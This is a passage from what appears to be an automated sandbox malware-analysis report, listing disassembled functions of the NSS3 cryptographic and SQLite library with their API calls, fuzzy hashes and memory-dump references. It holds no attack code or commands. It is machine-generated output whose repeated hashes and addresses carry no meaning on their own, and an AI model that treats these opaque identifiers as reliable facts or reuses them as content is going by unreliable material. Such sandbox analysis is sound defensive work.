                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8151E071A043559BEB10DE68DC89B9B77E6EF84348F14043CEC6983651E731E816CFAA
                                                                                                                                                                                                                                                                                          Function 6C718F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C718FAF
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C718FD1
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C718FFA
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C719013
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C719042
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C71905A
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C719073
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7190EC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0F00: PR_GetPageSize.NSS3(6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0F00: PR_NewLogModule.NSS3(clock,6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F25
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C70DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C719111
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2831689957-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 143b8240f35383aa82bfc44e59087888e179682f77f9c989e5edf2a4b28e5b68
                                                                                                                                                                                                                                                                                          • Instruction ID: 666ce2b3f52784d6bc9a45b96fe3dcb4f2d5db788790b0364795047d49f245dd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 143b8240f35383aa82bfc44e59087888e179682f77f9c989e5edf2a4b28e5b68
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E518C74A092058FCF40EF38C688299BBF4AF49318F494579DC449BB16EB34E889CB81
                                                                                                                                                                                                                                                                                          Function 6C6F7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6F3F7F,?,00000055,?,?,6C6F1666,?,?), ref: 6C6F40D9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C6F1666,?,?), ref: 6C6F40FC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C6F1666,?,?), ref: 6C6F4138
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C6F7CFD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BF0: TlsGetValue.KERNEL32(?,?,?,6C800A75), ref: 6C7B9C07
                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C819030), ref: 6C6F7D1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C6F1A3E,00000048,00000054), ref: 6C74FD56
                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C819048), ref: 6C6F7D2F
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C6F7D50
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C6F7D61
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6F7D7D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6F7D9C
                                                                                                                                                                                                                                                                                          • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C6F7DB8
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C6F7E19
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 70581797-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 83a077807d61bec53f70f17f29506c56c5e2727774c07e96c3230d14e491c3a3
                                                                                                                                                                                                                                                                                          • Instruction ID: 6f8d1895b7170010e1c15c94dbfed96974ad9080846b8d0e67c469d71a052b00
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83a077807d61bec53f70f17f29506c56c5e2727774c07e96c3230d14e491c3a3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3241E672A0011A9FEB009E699C45BEF33E5AF5135CF450024EC29A7B51E730E91AC7F9
                                                                                                                                                                                                                                                                                          Function 6C707EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,?,6C7080DD), ref: 6C707F15
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C7080DD), ref: 6C707F36
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C7080DD), ref: 6C707F3D
                                                                                                                                                                                                                                                                                          • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C7080DD), ref: 6C707F5D
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C7080DD), ref: 6C707F94
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C707F9B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08B,00000000,6C7080DD), ref: 6C707FD0
                                                                                                                                                                                                                                                                                          • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C7080DD), ref: 6C707FE6
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,6C7080DD), ref: 6C70802D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4037168058-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4585498c8e5c9070921a84a226d4f0f16b6aee22acf6fa49e0088b2624d6540c
                                                                                                                                                                                                                                                                                          • Instruction ID: d44c6b9359fa4e29554f2b5a8b7292aede81431186a5ed07a6286935dabeab4a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4585498c8e5c9070921a84a226d4f0f16b6aee22acf6fa49e0088b2624d6540c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 424106B1B412008BDB609FB8898CA4737B9AB4735CF904239E51983B41DF78F41ACBE1
                                                                                                                                                                                                                                                                                          Function 6C74FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C74FF00
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C74FF18
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C74FF26
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C74FF4F
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C74FF7A
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C74FF8C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1233137751-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ce1004cbea8acbe2a12b3188ce0c9e66cbbb8ccff039cd36fb97dd01b4d635ef
                                                                                                                                                                                                                                                                                          • Instruction ID: 2ee0a3a00397b2d26bcad87b8888e7c446a2741308208b6294a9f6e31a870190
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce1004cbea8acbe2a12b3188ce0c9e66cbbb8ccff039cd36fb97dd01b4d635ef
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA3166B2D013129BEB208F588E45B5B76A8AF5234CF548139ED1C97B40FB30D924C7D1
                                                                                                                                                                                                                                                                                          Function 6C697D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C697E27
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C697E67
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C697EED
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C697F2E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b657c7555fe8034fc6ef24d73477666365d9b4b1bf36360ed4a0f605049f016
                                                                                                                                                                                                                                                                                          • Instruction ID: 07bf36c0b7d612db1113babaa8305b07109483877f18da05a70cc4a9e005f727
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b657c7555fe8034fc6ef24d73477666365d9b4b1bf36360ed4a0f605049f016
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D061D370A042069FCB15CF68C890BAA37B2BF45308F1448A8EC095FB52D731EC56CBE8
                                                                                                                                                                                                                                                                                          Function 6C67FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C67FD7A
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67FD94
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C67FE3C
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67FE83
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C67FEFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C67FF3B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: fc39eadd455717628c098388cba2f7da45b85a2d232ab6d9405574baf9fc02c0
                                                                                                                                                                                                                                                                                          • Instruction ID: b846c579e22d1bea5d46266a2fd05339a8d844fadd4d756b311738e9b401b396
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc39eadd455717628c098388cba2f7da45b85a2d232ab6d9405574baf9fc02c0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06518271A00205DFDB14CF99C990EAEB7F1EF48308F144869E905AB752E735EC81CBA5
                                                                                                                                                                                                                                                                                          Function 6C7C2F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7C2FFD
                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C7C3007
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7C3032
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C82AAF9,?), ref: 6C7C3073
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C30B3
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7C30C0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7C30BB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                                                                                          • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                                                                                          • API String ID: 750880481-4279182443
                                                                                                                                                                                                                                                                                          • Opcode ID: d5045d73e0aebcd950209df5bf5df601e9c15a8d894140578288839d63d2723d
                                                                                                                                                                                                                                                                                          • Instruction ID: 668b5b0cef1714cf9d3377f405e5892c2a400f5bba22674562af7aa0c29ca49c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5045d73e0aebcd950209df5bf5df601e9c15a8d894140578288839d63d2723d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E741A172700606AFDB10CF25D940A8AB7A6FF44358F148638EC5987B40E731F995CBD2
                                                                                                                                                                                                                                                                                          Function 6C745ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]tl), ref: 6C745F0A
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C745F1F
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(89000904), ref: 6C745F2F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(890008E8), ref: 6C745F55
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C745F6D
                                                                                                                                                                                                                                                                                          • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C745F7D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C745220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C745F82,8B4274C0), ref: 6C745248
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C745220: EnterCriticalSection.KERNEL32(0F6C810D,?,6C745F82,8B4274C0), ref: 6C74525C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C745220: PR_SetError.NSS3(00000000,00000000), ref: 6C74528E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C745220: PR_Unlock.NSS3(0F6C80F1), ref: 6C745299
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C745220: free.MOZGLUE(00000000), ref: 6C7452A9
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                                                                                                          • String ID: q]tl
                                                                                                                                                                                                                                                                                          • API String ID: 3150690610-2582918279
                                                                                                                                                                                                                                                                                          • Opcode ID: 0875fc32497a69af6b8235d567073e9ae52e59fbe36748f3802e0cf646c0df92
                                                                                                                                                                                                                                                                                          • Instruction ID: ae41ecb7cac820f72737e3c919a7995b7b35ca56a723ea692670e8ad741e46a9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0875fc32497a69af6b8235d567073e9ae52e59fbe36748f3802e0cf646c0df92
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B721D6B1D002049FDB10AF68ED49AEEB7B4EF09318F544039E909A7741EB31A958CBD1
                                                                                                                                                                                                                                                                                          Function 6C708CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C71124D,00000001), ref: 6C708D19
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C71124D,00000001), ref: 6C708D32
                                                                                                                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C71124D,00000001), ref: 6C708D73
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C71124D,00000001), ref: 6C708D8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C71124D,00000001), ref: 6C708DBA
